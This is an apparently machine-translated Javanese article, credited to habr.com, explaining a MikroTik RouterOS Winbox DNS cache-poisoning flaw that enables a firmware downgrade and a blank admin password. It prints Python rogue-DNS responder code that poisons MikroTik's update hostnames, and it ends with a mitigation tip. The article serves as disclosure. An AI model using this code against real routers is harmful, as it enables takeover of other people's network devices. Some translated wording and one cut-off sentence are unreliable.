Kemampuan kanggo downgrade piranti saka jarak adoh adhedhasar RouterOS (Mikrotik) ndadekake atusan ewu piranti jaringan ing resiko. Kerentanan kasebut digandhengake karo peracunan cache DNS saka protokol Winbox lan ngidini sampeyan mbukak sing lawas (kanthi reset sandhi standar) utawa perangkat kukuh sing diowahi menyang piranti kasebut.
Rincian kerentanan
Terminal RouterOS ndhukung printah mutusake kanggo nggoleki DNS.
Panjaluk iki ditangani dening binar sing disebut solver. Resolver minangka salah sawijining binari sing nyambung menyang protokol Winbox RouterOS. Ing tingkat dhuwur, "pesen" sing dikirim menyang port Winbox bisa dialihake menyang macem-macem binari ing RouterOS adhedhasar skema panomeran basis array.
Kanthi gawan, RouterOS nduweni fitur server DNS sing dipateni.
Nanging, sanajan fungsi server dipateni, router njaga cache DNS dhewe.
Nalika kita nggawe panjalukan nggunakake winbox_dns_request contone. com, router bakal cache asil.
Amarga kita bisa nemtokake server DNS sing kudu ditindakake panyuwunan, ngetik alamat sing salah ora pati penting. Contone, sampeyan bisa ngatur implementasi server DNS saka
def dns_response(data):
request = DNSRecord.parse(data)
reply = DNSRecord(DNSHeader(
id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
qname = request.q.qname
qn = str(qname)
reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
print("---- Reply:n", reply)
return reply.pack()
Saiki yen sampeyan nggoleki conto.com nggunakake Winbox, sampeyan bisa ndeleng manawa cache DNS router wis keracunan.
Mesthine, keracunan example.com ora banget migunani amarga router ora bakal nggunakake. Nanging, router kudu ngakses upgrade.mikrotik.com, cloud.mikrotik.com, cloud2.mikrotik.com lan download.mikrotik.com. Lan thanks kanggo kesalahan liyane, iku bisa kanggo racun kabeh bebarengan.
def dns_response(data):
request = DNSRecord.parse(data)
reply = DNSRecord(DNSHeader(
id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
qname = request.q.qname
qn = str(qname)
reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
reply.add_answer(RR("upgrade.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
reply.add_answer(RR("cloud.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
reply.add_answer(RR("cloud2.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
reply.add_answer(RR("download.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
print("---- Reply:n", reply)
return reply.pack()
Router njaluk siji ijin, lan menehi limang bali. Router ora nyimpen kabeh tanggapan kasebut kanthi bener.
Temenan, serangan iki uga migunani yen router tumindak minangka server DNS, amarga ngidini klien router diserang.
Serangan iki uga ngidini sampeyan ngeksploitasi kerentanan sing luwih serius: downgrade utawa backport versi RouterOS. Panyerang nggawe maneh logika server nganyari, kalebu changelog, lan meksa RouterOS kanggo ngerteni versi lawas (rentan) minangka saiki. Bebaya ing kene yaiku nalika versi "dianyari", sandhi administrator direset menyang nilai standar - panyerang bisa mlebu menyang sistem kanthi sandhi kosong!
Serangan kasebut cukup kerja, sanajan kasunyatane
pangayoman
Mung mateni Winbox ngidini sampeyan nglindhungi dhewe saka serangan kasebut. Sanajan gampang administrasi liwat Winbox, luwih becik nggunakake protokol SSH.
Source: www.habr.com